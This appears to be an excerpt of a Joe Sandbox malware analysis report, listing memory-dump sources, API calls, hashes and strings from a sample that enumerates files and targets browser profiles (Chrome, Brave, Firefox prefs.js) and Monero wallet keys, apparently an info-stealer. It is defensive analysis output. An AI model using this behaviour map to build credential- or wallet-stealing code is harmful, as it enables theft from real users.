                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 8a99fa60f6aa55b7ff305d2ee62fadf23372258a2905f6e5407d3d537208ee74
                                • Instruction ID: b5510184267298bf988ef18117d657e186ecd9c544e3e3e59bdabbfd8d3c5992
                                • Opcode Fuzzy Hash: 8a99fa60f6aa55b7ff305d2ee62fadf23372258a2905f6e5407d3d537208ee74
                                • Instruction Fuzzy Hash: C1E086B0945308FBEB10ABE4DC0EB9876B8EB04B41F500044F70CBA2C0C6F42602DADA
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008B10B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008B10F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: d00395ec1e9c84853918a65ce34641fa5d478bae88db014b8b365ee45a20f9f5
                                • Instruction ID: 50bec8ae606f18d8b47d9f8e59d03268b54bb398214985bb96a7154e675b4f77
                                • Opcode Fuzzy Hash: d00395ec1e9c84853918a65ce34641fa5d478bae88db014b8b365ee45a20f9f5
                                • Instruction Fuzzy Hash: A2F0E9B1641204BBEB14E6E49C59FFAB7E8E705715F300448F508E7380D571AE04CA91
                                APIs
                                  • Part of subcall function 008C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C7910
                                  • Part of subcall function 008C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008C7917
                                  • Part of subcall function 008C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008C792F
                                  • Part of subcall function 008C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008B11B7), ref: 008C7880
                                  • Part of subcall function 008C7850: RtlAllocateHeap.NTDLL(00000000), ref: 008C7887
                                  • Part of subcall function 008C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008C789F
                                • ExitProcess.KERNEL32 ref: 008B11C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 40939a954a9ef492dbd4447e4eee1f796b4dbd751868e4cbe5973b29edcb31c5
                                • Instruction ID: 1faa67b937546689a74e32cd1a768832267aa55ace0bae00ad4ffd3e279b0f33
                                • Opcode Fuzzy Hash: 40939a954a9ef492dbd4447e4eee1f796b4dbd751868e4cbe5973b29edcb31c5
                                • Instruction Fuzzy Hash: D4E0ECA595420152DA10B3F9AC1AF6A32ACFB24745F040428FA09D6202FA35E805C96B
                                APIs
                                • wsprintfA.USER32 ref: 008C38CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 008C38E3
                                • lstrcat.KERNEL32(?,?), ref: 008C3935
                                • StrCmpCA.SHLWAPI(?,008D0F70), ref: 008C3947
                                • StrCmpCA.SHLWAPI(?,008D0F74), ref: 008C395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008C3C67
                                • FindClose.KERNEL32(000000FF), ref: 008C3C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: f534b85400b192e581000a687d6c2caddaa3cc8de26d239b34a945a45a95217b
                                • Instruction ID: b1291e3588ba92e15bc88f4ecd081e80256ff04423de9318b4e984331c07cb25
                                • Opcode Fuzzy Hash: f534b85400b192e581000a687d6c2caddaa3cc8de26d239b34a945a45a95217b
                                • Instruction Fuzzy Hash: EAA13FB1A002189BDB24EBA4DC85FFE7378FB58300F04859DA51DD6141EB759B85CFA2
                                APIs
                                • wsprintfA.USER32 ref: 008C492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 008C4943
                                • StrCmpCA.SHLWAPI(?,008D0FDC), ref: 008C4971
                                • StrCmpCA.SHLWAPI(?,008D0FE0), ref: 008C4987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008C4B7D
                                • FindClose.KERNEL32(000000FF), ref: 008C4B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*$0{
                                • API String ID: 180737720-108428910
                                • Opcode ID: 59cd38d2348b55597cb4b7840dddd26a6a60c9a255bcb20a6799d3bc94cf18f0
                                • Instruction ID: 0acd325df9cf9db86344cbcd45be7052c9767af2d318b23d8076353537d24007
                                • Opcode Fuzzy Hash: 59cd38d2348b55597cb4b7840dddd26a6a60c9a255bcb20a6799d3bc94cf18f0
                                • Instruction Fuzzy Hash: E86123B1500218ABCB24EBE4DC59FFA7778FB58700F04859CA50DD6141EA75EB89CFA2
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • FindFirstFileA.KERNEL32(00000000,?,008D0B32,008D0B2B,00000000,?,?,?,008D13F4,008D0B2A), ref: 008BBEF5
                                • StrCmpCA.SHLWAPI(?,008D13F8), ref: 008BBF4D
                                • StrCmpCA.SHLWAPI(?,008D13FC), ref: 008BBF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008BC7BF
                                • FindClose.KERNEL32(000000FF), ref: 008BC7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 3cda1b38200577289d89ae82eacc883ec952ec6031080b28740fcba6b98d7785
                                • Instruction ID: cf1e88ad99e2c3a763c24cf5a5a8cc35d0cbbeff33e7ac43df07d90889a1c255
                                • Opcode Fuzzy Hash: 3cda1b38200577289d89ae82eacc883ec952ec6031080b28740fcba6b98d7785
                                • Instruction Fuzzy Hash: 7B421172910108ABCB18FBA4DD96EED7379FB54304F40856CB50AD6191EE34EB49CBA3
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008C4580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C4587
                                • wsprintfA.USER32 ref: 008C45A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 008C45BD
                                • StrCmpCA.SHLWAPI(?,008D0FC4), ref: 008C45EB
                                • StrCmpCA.SHLWAPI(?,008D0FC8), ref: 008C4601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008C468B
                                • FindClose.KERNEL32(000000FF), ref: 008C46A0
                                • lstrcat.KERNEL32(?,007BE130), ref: 008C46C5
                                • lstrcat.KERNEL32(?,007BD2A0), ref: 008C46D8
                                • lstrlen.KERNEL32(?), ref: 008C46E5
                                • lstrlen.KERNEL32(?), ref: 008C46F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*$0{
                                • API String ID: 671575355-2992801943
                                • Opcode ID: a023ae1475e9592de8dba3c5969a57660c59baa50cdfabe4570b833df23ef76e
                                • Instruction ID: c411f66a21dc04e7dbce422e370659d893394eb97306d4242ef106ae4e1d2500
                                • Opcode Fuzzy Hash: a023ae1475e9592de8dba3c5969a57660c59baa50cdfabe4570b833df23ef76e
                                • Instruction Fuzzy Hash: 695120B25402189BCB24EBF4DC99FE97778FB68700F404588A60DD6190EB75DA85CFA2
                                APIs
                                • wsprintfA.USER32 ref: 008C3EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 008C3EDA
                                • StrCmpCA.SHLWAPI(?,008D0FAC), ref: 008C3F08
                                • StrCmpCA.SHLWAPI(?,008D0FB0), ref: 008C3F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008C406C
                                • FindClose.KERNEL32(000000FF), ref: 008C4081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: {$%s\%s$0{
                                • API String ID: 180737720-4204578840
                                • Opcode ID: 640361e6f53700d4a2a33454d539a75eefcbe69dcd24d9d80dc4b72e8dc6a07f
                                • Instruction ID: 9680352416afbccf81771430480b1b3e0671306f3e0dcea994d390bdb1422ca0
                                • Opcode Fuzzy Hash: 640361e6f53700d4a2a33454d539a75eefcbe69dcd24d9d80dc4b72e8dc6a07f
                                • Instruction Fuzzy Hash: CA5110B1900218ABCB24EBE4DC85FEA7378FB58740F40858DB659D6140DA75EB8ACF91
                                APIs
                                • wsprintfA.USER32 ref: 008BED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 008BED55
                                • StrCmpCA.SHLWAPI(?,008D1538), ref: 008BEDAB
                                • StrCmpCA.SHLWAPI(?,008D153C), ref: 008BEDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008BF2AE
                                • FindClose.KERNEL32(000000FF), ref: 008BF2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: 09b577621e0b32f6fa084b632b0d4d677f446fc3daa9c2605d68f8bce0c53e96
                                • Instruction ID: 3c501381638f9be576f676aa563df85d478874b0a03d5e479842e3648177a846
                                • Opcode Fuzzy Hash: 09b577621e0b32f6fa084b632b0d4d677f446fc3daa9c2605d68f8bce0c53e96
                                • Instruction Fuzzy Hash: 80E1A97191111C9ADB58EB64DC96FEE7338FF54304F4041A9B50AE2192EE34AF8ACE52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: b_{$ rk?$"vu$3@Sv$6wo|$IA_$Wj|>$awm$tzm}$=Ww$`9_$twU
                                • API String ID: 0-3776382672
                                • Opcode ID: 984ed4194b3efa7f7605a828df479412178a8ef01417745ec7eda34fd24d402d
                                • Instruction ID: 97b622398f2a0b623dc5cb5112c90656699dec15d0c40c71696815c501ead831
                                • Opcode Fuzzy Hash: 984ed4194b3efa7f7605a828df479412178a8ef01417745ec7eda34fd24d402d
                                • Instruction Fuzzy Hash: D6B21AF3A0C2009FE7046E2DEC8567ABBE5EFD4220F1A853DE9C4D7744E63598058697
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008D15B8,008D0D96), ref: 008BF71E
                                • StrCmpCA.SHLWAPI(?,008D15BC), ref: 008BF76F
                                • StrCmpCA.SHLWAPI(?,008D15C0), ref: 008BF785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008BFAB1
                                • FindClose.KERNEL32(000000FF), ref: 008BFAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 3a536852fc31abfee61d8d8b2ac2cf8c66159aac0ff8adb471382ab10864354a
                                • Instruction ID: 4e685b52eec346a5364527fe79dbaf8d38c3ff2fe7b8aef4445e6d81ea97b9e7
                                • Opcode Fuzzy Hash: 3a536852fc31abfee61d8d8b2ac2cf8c66159aac0ff8adb471382ab10864354a
